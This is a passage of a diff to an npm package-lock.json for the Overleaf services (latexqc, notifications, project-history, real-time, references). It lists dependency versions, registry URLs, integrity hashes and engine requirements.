"funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "services/latexqc/node_modules/cookie": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.6.0.tgz", + "integrity": "sha512-U71cyTamuh1CRNCfpGY6to28lxvNwPG4Guz/EVjgf3Jmzv0vlDp1atT9eS5dDjMYHucpHbWns6Lwf3BKz6svdw==", + "engines": { + "node": ">= 0.6" + } + }, + "services/latexqc/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "services/latexqc/node_modules/debug/node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true, + "license": "MIT" + }, + "services/latexqc/node_modules/deep-eql": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-4.1.4.tgz", + "integrity": "sha512-SUwdGfqdKOwxCPeVYjwSyRpJ7Z+fhpwIAtmCUdZIWZ/YP5R9WAsyuSgpLVDi9bjWoN2LXHNss/dk3urXtdQxGg==", + "dev": true, + "dependencies": { + "type-detect": "^4.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "services/latexqc/node_modules/diff": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/diff/-/diff-7.0.0.tgz", + "integrity": "sha512-PJWHUb1RFevKCwaFA9RlG5tCd+FO5iRh9A8HEtkmBH2Li03iJriB6m6JIN4rGz3K3JLawI7/veA1xzRKP6ISBw==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/latexqc/node_modules/entities": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "dev": true, + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "services/latexqc/node_modules/eslint": { + "version": "7.32.0", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-7.32.0.tgz", + "integrity": "sha512-VHZ8gX+EDfz+97jGcgyGCyRia/dPOd6Xh9yPv8Bl1+SoaIwD+a/vlrOmGRUyOYu7MwUhc7CxqeaDZU13S4+EpA==", + "dev": true, + "dependencies": { + "@babel/code-frame": "7.12.11", + "@eslint/eslintrc": "^0.4.3", + "@humanwhocodes/config-array": "^0.5.0", + "ajv": "^6.10.0", + "chalk": "^4.0.0", + "cross-spawn": "^7.0.2", + "debug": "^4.0.1", + "doctrine": "^3.0.0", + "enquirer": "^2.3.5", + "escape-string-regexp": "^4.0.0", + 
"eslint-scope": "^5.1.1", + "eslint-utils": "^2.1.0", + "eslint-visitor-keys": "^2.0.0", + "espree": "^7.3.1", + "esquery": "^1.4.0", + "esutils": "^2.0.2", + "fast-deep-equal": "^3.1.3", + "file-entry-cache": "^6.0.1", + "functional-red-black-tree": "^1.0.1", + "glob-parent": "^5.1.2", + "globals": "^13.6.0", + "ignore": "^4.0.6", + "import-fresh": "^3.0.0", + "imurmurhash": "^0.1.4", + "is-glob": "^4.0.0", + "js-yaml": "^3.13.1", + "json-stable-stringify-without-jsonify": "^1.0.1", + "levn": "^0.4.1", + "lodash.merge": "^4.6.2", + "minimatch": "^3.0.4", + "natural-compare": "^1.4.0", + "optionator": "^0.9.1", + "progress": "^2.0.0", + "regexpp": "^3.1.0", + "semver": "^7.2.1", + "strip-ansi": "^6.0.0", + "strip-json-comments": "^3.1.0", + "table": "^6.0.9", + "text-table": "^0.2.0", + "v8-compile-cache": "^2.0.3" + }, + "bin": { + "eslint": "bin/eslint.js" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "services/latexqc/node_modules/eslint-config-standard": { + "version": "16.0.3", + "resolved": "https://registry.npmjs.org/eslint-config-standard/-/eslint-config-standard-16.0.3.tgz", + "integrity": "sha512-x4fmJL5hGqNJKGHSjnLdgA6U6h1YW/G2dW9fA+cyVur4SK6lyue8+UgNKWlZtUDTXvgKDD/Oa3GQjmB5kjtVvg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "peerDependencies": { + "eslint": "^7.12.1", + "eslint-plugin-import": "^2.22.1", + "eslint-plugin-node": "^11.1.0", + "eslint-plugin-promise": "^4.2.1 || ^5.0.0" + } + }, + "services/latexqc/node_modules/eslint-plugin-promise": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-promise/-/eslint-plugin-promise-5.2.0.tgz", + "integrity": "sha512-SftLb1pUG01QYq2A/hGAWfDRXqYD82zE7j7TopDOyNdU+7SvvoXREls/+PRTY17vUXzXnZA/zfnyKgRH6x4JJw==", + "dev": true, + "peer": true, + "engines": { + "node": "^10.12.0 || >=12.0.0" + }, + "peerDependencies": { + "eslint": "^7.0.0" + } + }, + "services/latexqc/node_modules/espree": { + "version": "7.3.1", + "resolved": "https://registry.npmjs.org/espree/-/espree-7.3.1.tgz", + "integrity": "sha512-v3JCNCE64umkFpmkFGqzVKsOT0tN1Zr+ueqLZfpV1Ob8e+CEgPWa+OxCoGH3tnhimMKIaBm4m/vaRpJ/krRz2g==", + "dev": true, + "dependencies": { + "acorn": "^7.4.0", + "acorn-jsx": "^5.3.1", + "eslint-visitor-keys": "^1.3.0" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "services/latexqc/node_modules/espree/node_modules/eslint-visitor-keys": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", + "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/globals": { + "version": "13.24.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.24.0.tgz", + "integrity": "sha512-AhO5QUcj8llrbG09iWhPU2B204J1xnPeL8kQmVorSsy+Sjj1sk8gIyh6cUocGmH4L0UuhAJy+hJMRA4mgA4mFQ==", + "dev": true, + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/latexqc/node_modules/helmet": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/helmet/-/helmet-7.1.0.tgz", + "integrity": 
"sha512-g+HZqgfbpXdCkme/Cd/mZkV0aV3BZZZSugecH03kl38m/Kmdx8jKjBikpDj2cr+Iynv4KpYEviojNdTJActJAg==", + "engines": { + "node": ">=16.0.0" + } + }, + "services/latexqc/node_modules/https-proxy-agent": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "dev": true, + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" + } + }, + "services/latexqc/node_modules/ignore": { + "version": "4.0.6", + "resolved": "https://registry.npmjs.org/ignore/-/ignore-4.0.6.tgz", + "integrity": "sha512-cyFDKrqc/YdcWFniJhzI42+AzS+gNwmUzOSFcRCQYwySuBBBy/KjuxWLZ/FHEH6Moq1NizMOBWyTcv8O4OZIMg==", + "dev": true, + "engines": { + "node": ">= 4" + } + }, + "services/latexqc/node_modules/js-yaml": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", + "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dev": true, + "dependencies": { + "argparse": "^1.0.7", + "esprima": "^4.0.0" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "services/latexqc/node_modules/jsdom": { + "version": "20.0.3", + "resolved": "https://registry.npmjs.org/jsdom/-/jsdom-20.0.3.tgz", + "integrity": "sha512-SYhBvTh89tTfCD/CRdSOm13mOBa42iTaTyfyEWBdKcGdPxPtLFBXuHR8XHb33YNYaP+lLbmSvBTsnoesCNJEsQ==", + "dev": true, + "dependencies": { + "abab": "^2.0.6", + "acorn": "^8.8.1", + "acorn-globals": "^7.0.0", + "cssom": "^0.5.0", + "cssstyle": "^2.3.0", + "data-urls": "^3.0.2", + "decimal.js": "^10.4.2", + "domexception": "^4.0.0", + "escodegen": "^2.0.0", + "form-data": "^4.0.0", + "html-encoding-sniffer": "^3.0.0", + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.1", + "is-potential-custom-element-name": "^1.0.1", + "nwsapi": "^2.2.2", + "parse5": "^7.1.1", + "saxes": "^6.0.0", + "symbol-tree": "^3.2.4", + "tough-cookie": "^4.1.2", + "w3c-xmlserializer": "^4.0.0", + "webidl-conversions": "^7.0.0", + "whatwg-encoding": "^2.0.0", + "whatwg-mimetype": "^3.0.0", + "whatwg-url": "^11.0.0", + "ws": "^8.11.0", + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "canvas": "^2.5.0" + }, + "peerDependenciesMeta": { + "canvas": { + "optional": true + } + } + }, + "services/latexqc/node_modules/jsdom/node_modules/acorn": { + "version": "8.12.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.12.1.tgz", + "integrity": "sha512-tcpGyI9zbizT9JbV6oYE477V6mTlXvvi0T0G3SNIYE2apm/G5huBa1+K89VGeovbg+jycCrfhl3ADxErOuO6Jg==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "services/latexqc/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "services/latexqc/node_modules/just-extend": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/just-extend/-/just-extend-6.2.0.tgz", + "integrity": "sha512-cYofQu2Xpom82S6qD778jBDpwvvy39s1l/hrYij2u9AMdQcGRpaBu6kY4mVhuno5kJVi1DAz4aiphA2WI1/OAw==", + "dev": true + }, + "services/latexqc/node_modules/method-override": { + "version": "2.3.10", + "resolved": "https://registry.npmjs.org/method-override/-/method-override-2.3.10.tgz", + "integrity": 
"sha512-Ks2/7e+3JuwQcpLybc6wTHyqg13HDjOhLcE+YaAEub9DbSxF+ieMvxUlybmWW9luRMh9Cd0rO9aNtzUT51xfNQ==", + "dependencies": { + "debug": "2.6.9", + "methods": "~1.1.2", + "parseurl": "~1.3.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "services/latexqc/node_modules/method-override/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "services/latexqc/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "services/latexqc/node_modules/nise": { + "version": "6.1.1", + "resolved": "https://registry.npmjs.org/nise/-/nise-6.1.1.tgz", + "integrity": "sha512-aMSAzLVY7LyeM60gvBS423nBmIPP+Wy7St7hsb+8/fc1HmeoHJfLO8CKse4u3BtOZvQLJghYPI2i/1WZrEj5/g==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^3.0.1", + "@sinonjs/fake-timers": "^13.0.1", + "@sinonjs/text-encoding": "^0.7.3", + "just-extend": "^6.2.0", + "path-to-regexp": "^8.1.0" + } + }, + "services/latexqc/node_modules/optionator": { + "version": "0.9.4", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.4.tgz", + "integrity": "sha512-6IpQ7mKUxRcZNLIObR0hz7lxsapSSIYNZJwXPGeF0mTVqGKFIXj1DQcMoT22S3ROcLyY/rz0PWaWZ9ayWmad9g==", + "dev": true, + "dependencies": { + "deep-is": "^0.1.3", + "fast-levenshtein": "^2.0.6", + "levn": "^0.4.1", + "prelude-ls": "^1.2.1", + "type-check": "^0.4.0", + "word-wrap": "^1.2.5" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "services/latexqc/node_modules/parse5": { + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/parse5/-/parse5-7.1.2.tgz", + "integrity": "sha512-Czj1WaSVpaoj0wbhMzLmWD69anp2WH7FXMB9n1Sy8/ZFF9jolSQVMu1Ij5WIyGmcBmhk7EOndpO4mIpihVqAXw==", + "dev": true, + "dependencies": { + "entities": "^4.4.0" + }, + "funding": { + "url": "https://github.com/inikulin/parse5?sponsor=1" + } + }, + "services/latexqc/node_modules/path-to-regexp": { + "version": "8.2.0", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.2.0.tgz", + "integrity": "sha512-TdrF7fW9Rphjq4RjrW0Kp2AW0Ahwu9sRGTkS6bvDi0SCwZlEZYmcfDbEsTz8RVk0EHIS/Vd1bv3JhG+1xZuAyQ==", + "dev": true, + "engines": { + "node": ">=16" + } + }, + "services/latexqc/node_modules/react-cookie": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/react-cookie/-/react-cookie-7.2.0.tgz", + "integrity": "sha512-mqhPERUyfOljq5yJ4woDFI33bjEtigsl8JDJdPPeNhr0eSVZmBc/2Vdf8mFxOUktQxhxTR1T+uF0/FRTZyBEgw==", + "dependencies": { + "@types/hoist-non-react-statics": "^3.3.5", + "hoist-non-react-statics": "^3.3.2", + "universal-cookie": "^7.0.0" + }, + "peerDependencies": { + "react": ">= 16.3.0" + } + }, + "services/latexqc/node_modules/react-dropzone": { + "version": "14.2.3", + "resolved": "https://registry.npmjs.org/react-dropzone/-/react-dropzone-14.2.3.tgz", + "integrity": "sha512-O3om8I+PkFKbxCukfIR3QAGftYXDZfOE2N1mr/7qebQJHs7U+/RSL/9xomJNpRg9kM5h9soQSdf0Gc7OHF5Fug==", + "dependencies": { + "attr-accept": "^2.2.2", + "file-selector": "^0.6.0", + "prop-types": "^15.8.1" + }, + "engines": { + "node": ">= 10.13" + }, + "peerDependencies": { + "react": ">= 16.8 || 18.0.0" + } + }, + "services/latexqc/node_modules/react-fast-compare": { + "version": "3.2.2", + "resolved": 
"https://registry.npmjs.org/react-fast-compare/-/react-fast-compare-3.2.2.tgz", + "integrity": "sha512-nsO+KSNgo1SbJqJEYRE9ERzo7YtYbou/OqjSQKxV7jcKox7+usiUVZOAC+XnDOABXggQTno0Y1CpVnuWEc1boQ==" + }, + "services/latexqc/node_modules/react-helmet": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/react-helmet/-/react-helmet-6.1.0.tgz", + "integrity": "sha512-4uMzEY9nlDlgxr61NL3XbKRy1hEkXmKNXhjbAIOVw5vcFrsdYbH2FEwcNyWvWinl103nXgzYNlns9ca+8kFiWw==", + "dependencies": { + "object-assign": "^4.1.1", + "prop-types": "^15.7.2", + "react-fast-compare": "^3.1.1", + "react-side-effect": "^2.1.0" + }, + "peerDependencies": { + "react": ">=16.3.0" + } + }, + "services/latexqc/node_modules/react-helmet/node_modules/react-side-effect": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/react-side-effect/-/react-side-effect-2.1.2.tgz", + "integrity": "sha512-PVjOcvVOyIILrYoyGEpDN3vmYNLdy1CajSFNt4TDsVQC5KpTijDvWVoR+/7Rz2xT978D8/ZtFceXxzsPwZEDvw==", + "peerDependencies": { + "react": "^16.3.0 || ^17.0.0 || ^18.0.0" + } + }, + "services/latexqc/node_modules/saxes": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/saxes/-/saxes-6.0.0.tgz", + "integrity": "sha512-xAg7SOnEhrm5zI3puOOKyy1OMcMlIJZYNJY7xLBwSze0UjhPLnWfj2GF2EpT0jmzaJKIWKHLsaSSajf35bcYnA==", + "dev": true, + "dependencies": { + "xmlchars": "^2.2.0" + }, + "engines": { + "node": ">=v12.22.7" + } + }, + "services/latexqc/node_modules/schema-utils": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.3.0.tgz", + "integrity": "sha512-Gf9qqc58SpCA/xdziiHz35F4GNIWYWZrEshUc/G/r5BnLph6xpKuLeoJoQuj5WfBIx/eQLf+hmVPYHaxJu7V2g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 10.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "services/latexqc/node_modules/schema-utils/node_modules/ajv": { + "version": "8.17.1", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.17.1.tgz", + "integrity": "sha512-B/gBuNg5SiMTrPkC+A2+cW0RszwxYmn6VYxB/inlBStS5nx6xHIt/ehKRhIMhqusl7a8LjQoZnjCs5vhwxOQ1g==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3", + "fast-uri": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "services/latexqc/node_modules/schema-utils/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "services/latexqc/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "services/latexqc/node_modules/sinon": { + "version": "19.0.2", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-19.0.2.tgz", + "integrity": "sha512-euuToqM+PjO4UgXeLETsfQiuoyPXlqFezr6YZDFwHR3t4qaX0fZUe1MfPMznTL5f8BWrVS89KduLdMUsxFCO6g==", + "dev": true, + 
"dependencies": { + "@sinonjs/commons": "^3.0.1", + "@sinonjs/fake-timers": "^13.0.2", + "@sinonjs/samsam": "^8.0.1", + "diff": "^7.0.0", + "nise": "^6.1.1", + "supports-color": "^7.2.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/latexqc/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/latexqc/node_modules/tr46": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-3.0.0.tgz", + "integrity": "sha512-l7FvfAHlcmulp8kr+flpQZmVwtu7nfRV7NZujtN0OqES8EL4O4e0qqzL0DC5gAvx/ZC/9lk6rhcUwYvkBnBnYA==", + "dev": true, + "dependencies": { + "punycode": "^2.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "services/latexqc/node_modules/type-detect": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.1.0.tgz", + "integrity": "sha512-Acylog8/luQ8L7il+geoSxhEkazvkslg7PSNKOX59mbB9cOveP5aq9h74Y7YU8yDpJwetzQQrfIwtf4Wp4LKcw==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "services/latexqc/node_modules/universal-cookie": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/universal-cookie/-/universal-cookie-7.2.0.tgz", + "integrity": "sha512-PvcyflJAYACJKr28HABxkGemML5vafHmiL4ICe3e+BEKXRMt0GaFLZhAwgv637kFFnnfiSJ8e6jknrKkMrU+PQ==", + "dependencies": { + "@types/cookie": "^0.6.0", + "cookie": "^0.6.0" + } + }, + "services/latexqc/node_modules/w3c-xmlserializer": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/w3c-xmlserializer/-/w3c-xmlserializer-4.0.0.tgz", + "integrity": "sha512-d+BFHzbiCx6zGfz0HyQ6Rg69w9k19nviJspaj4yNscGjrHu94sVP+aRm75yEbCh+r2/yR+7q6hux9LVtbuTGBw==", + "dev": true, + "dependencies": { + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "services/latexqc/node_modules/webpack-dev-middleware": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/webpack-dev-middleware/-/webpack-dev-middleware-6.1.3.tgz", + "integrity": "sha512-A4ChP0Qj8oGociTs6UdlRUGANIGrCDL3y+pmQMc+dSsraXHCatFpmMey4mYELA+juqwUqwQsUgJJISXl1KWmiw==", + "dev": true, + "dependencies": { + "colorette": "^2.0.10", + "memfs": "^3.4.12", + "mime-types": "^2.1.31", + "range-parser": "^1.2.1", + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "webpack": { + "optional": true + } + } + }, + "services/latexqc/node_modules/whatwg-url": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-11.0.0.tgz", + "integrity": "sha512-RKT8HExMpoYx4igMiVMY83lN6UeITKJlBQ+vR/8ZJ8OCdSiN3RwCq+9gH0+Xzj0+5IrM6i4j/6LuvzbZIQgEcQ==", + "dev": true, + "dependencies": { + "tr46": "^3.0.0", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "services/notifications": { + "name": "@overleaf/notifications", + "license": "ISC", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "method-override": "^3.0.0", + 
"mongodb-legacy": "6.1.3", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/project-history": { + "name": "@overleaf/project-history", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "aws-sdk": "^2.650.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "diff-match-patch": "overleaf/diff-match-patch#89805f9c671a77a263fc53461acd62aa7498f688", + "esmock": "^2.6.3", + "express": "^4.21.2", + "lodash": "^4.17.20", + "minimist": "^1.2.8", + "mongodb-legacy": "6.1.3", + "overleaf-editor-core": "*", + "p-queue": "^8.1.0", + "request": "^2.88.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "nock": "^13.5.3", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } + }, + "services/project-history/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/project-history/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/project-history/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/real-time": { + "name": "@overleaf/real-time", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "base64id": "0.1.0", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "connect-redis": "^6.1.3", + "cookie-parser": "^1.4.6", + "express": "^4.21.2", + "express-session": "^1.17.1", + "joi": "^17.12.0", + "lodash": "^4.17.21", + "proxy-addr": "^2.0.7", + "request": "^2.88.2", + "socket.io": "github:overleaf/socket.io#0.9.19-overleaf-11", + "socket.io-client": "github:overleaf/socket.io-client#0.9.17-overleaf-5" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "cookie-signature": "^1.1.0", + "mocha": "^11.1.0", + "sandboxed-module": "~0.3.0", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "timekeeper": "0.0.4", + "typescript": "^5.0.4", + "uid-safe": "^2.1.5" + } + }, + "services/real-time/node_modules/sandboxed-module": { + "version": "0.3.0", + "resolved": 
"https://registry.npmjs.org/sandboxed-module/-/sandboxed-module-0.3.0.tgz", + "integrity": "sha1-8fvvvYCaT2kHO9B8rm/H2y6vX2o=", + "dev": true, + "dependencies": { + "require-like": "0.1.2", + "stack-trace": "0.0.6" + } + }, + "services/real-time/node_modules/stack-trace": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.6.tgz", + "integrity": "sha1-HnGb1qJin/CcGJ4Xqe+QKpT8XbA=", + "dev": true, + "engines": { + "node": "*" + } + }, + "services/real-time/node_modules/timekeeper": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/timekeeper/-/timekeeper-0.0.4.tgz", + "integrity": "sha1-kNt58X2Ni1NiFUOJSSuXJ2LP0nY=", + "dev": true + }, + "services/references": { + "name": "@overleaf/references", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "ioredis": "^4.16.1", + "lodash": "^4.17.19" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.9", + "mocha": "^11.1.0", + "mongodb": "6.12.0", + "sinon": "^9.2.4", + "typescript": "^5.0.4" + } + }, + "services/references/node_modules/esmock": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/esmock/-/esmock-2.6.9.tgz", + "integrity": "sha512-SJ5YnoWi8yuGghBrupScARmIcUh2A2a2gIfdVRtQ2MQpQo91wMWHx/fsN0ZDERLAUso1ea4Q/9CKCL88O5MEpg==", + "dev": 